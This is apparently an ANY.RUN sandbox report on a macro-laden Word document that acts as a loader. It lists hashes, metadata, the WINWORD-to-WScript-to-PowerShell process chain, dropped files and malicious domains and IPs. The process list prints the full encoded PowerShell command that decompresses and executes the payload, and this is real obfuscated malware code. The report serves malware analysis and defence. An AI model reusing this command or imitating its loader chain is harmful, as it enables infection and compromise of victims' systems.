analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

maldoc.bin

Full analysis: https://app.any.run/tasks/b9d02b3c-078f-468b-9654-30ba9e87c495
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: October 20, 2020, 00:15:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
malscr-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: 4f77bcf5-fa96-419b-91ad-e36ef7cc8d4a, Subject: 118e9c6f-994e-4e7e-87f5-e9680fee79c3, Author: PRINTER-PC\\24-JOHN, Comments: thhxneyggkbdnmzdt, Template: Normal, Last Saved By: Windows, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Aug 6 10:17:00 2019, Last Saved Time/Date: Wed Oct 2 09:57:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

77113C4B55769ED162E3434207AB72DE

SHA1:

7C363326DFD118A46789F15DD83EB1E433241A58

SHA256:

3F79AA9CC581BF852D80E1FB9F85C69E7E44871FCD7E7E667211940EB9B6D060

SSDEEP:

768:gOxsgI/Q5Bfu44ca6WwFPbsexTNgniv3y2ceDSxz99QGwFbWPJappxpVp:bsgWQ5d1HNNgniPy2ceDS3mTFKPJ0jX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes scripts

      • WINWORD.EXE (PID: 2084)

    • Drops known JS loader

      • WINWORD.EXE (PID: 2084)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2084)

  • SUSPICIOUS

    • Creates files in the Windows directory

      • WINWORD.EXE (PID: 2084)
      • powershell.exe (PID: 2692)

    • Removes files from Windows directory

      • powershell.exe (PID: 2692)

    • Creates files in the user directory

      • powershell.exe (PID: 2692)

    • Executes PowerShell scripts

      • WScript.exe (PID: 604)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2084)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2084)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
  • ffwmamztsi
  • ffwmamztsi
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Bytes: 27648
Company: -
Manager: b1634bd7-b7e6-4527-aa8a-c3937460d4c0
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:10:02 08:57:00
CreateDate: 2019:08:06 09:17:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 7
LastModifiedBy: Пользователь Windows
Template: Normal
Comments: thhxneyggkbdnmzdt
Keywords: -
Author: PRINTER-PC\\24-JOHN
Subject: 118e9c6f-994e-4e7e-87f5-e9680fee79c3
Title: 4f77bcf5-fa96-419b-91ad-e36ef7cc8d4a
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
3
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe no specs wscript.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2084"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\maldoc.bin.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
604"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\khtcfmtbsf.js" C:\Windows\System32\WScript.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
2692"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAZgBjADEAQgBDADQASQB3AEcATQBiAHgAcgArAEoAQgBtAEYASgB0AFYAbwBmAEEAawBDAEEAdABDAEsAUwBUADQATQBXAEQAYwA3ADMATQB4AGUAYQBHAEwAaQBaADkAKwBsAFoAMABqAEMANwB2AGMAMwBuADUALwBVAE0ASABYAFkAWQBqAE4ASwBBAEYAQQByAGYAUwBmAHIAbwA3AE0ASQB2AGkANABBAHAAdAAxAGUASQBhAHUAagBZAHYAQgBWAHkAcgBmAFIARAA2AFoAMQB6AG8AZQBpAGcAMQBMAGMANgBYADgAaABTAGgAMwBsAHEAVABFAHEASQBmAGIAQgBSAE0ASwB5AHEAeAB2ADAAUgBwAFQAcQBVAGkAZABxAFMAegBZAE4AagAwADUAaQBBAHoAUABtAHIATwB0ADEAZwArAE4AMgBnAFoAbwBEAHgAdABhAGoASABjAHQASgB1AGEAQwBwAFIAcABkAGsAbQBDAFkAUQBZAFUALwA2AHQATQBWAE0ARQBrAHcAZABPAGYAeQB0AEYAWAAzAEYAdgAvAEQAYQA2AC8ANABBAHMAPQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIAZQBzAHMASQBPAE4ATQBPAEQARQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBFAEEARABFAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBBAGQAVABvAEUATgBEACgAKQAgAH0AIAApACAAfAAuACgAJwBJAGUAeAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 977
Read events
1 177
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR420F.tmp.cvr
MD5:
SHA256:
2692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8KFNDBHRBMPQLBNE0ZG7.temp
MD5:
SHA256:
2084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:78F6D51F2708EEE8C06F15EBC382EF6E
SHA256:72FAE3F03527EC4E2EFC89417656F068ABFC199A6091813C56B5627B7B155BA8
2692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d4e53.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2084WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D27F9A8FA66EEB869F1FFE5CD498361C
SHA256:934407F87216060D1AB9FFB15F270F571048D70E9575211F9FE8F66FB12301DD
2084WINWORD.EXEC:\Windows\Temp\khtcfmtbsf.jstext
MD5:B64AC5E47F9F7AD7D3C0987A51C45EFF
SHA256:96412013E7565CD48C8D05E7834D4EF1397435A410A8C5B4F41D28E2F929642B
2084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ldoc.bin.docpgc
MD5:B3455E32BD31568A61CD8E5D66824FDA
SHA256:8B58AE11B945B943EB916895A9F26628227C35C0011F29E219A2C0FAD6004A8E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2692
powershell.exe
198.54.117.197:80
sameslealm.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
oucricomal.com
malicious
sameslealm.com
  • 198.54.117.197
  • 198.54.117.198
  • 198.54.117.199
  • 198.54.117.200
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
maldoc.bin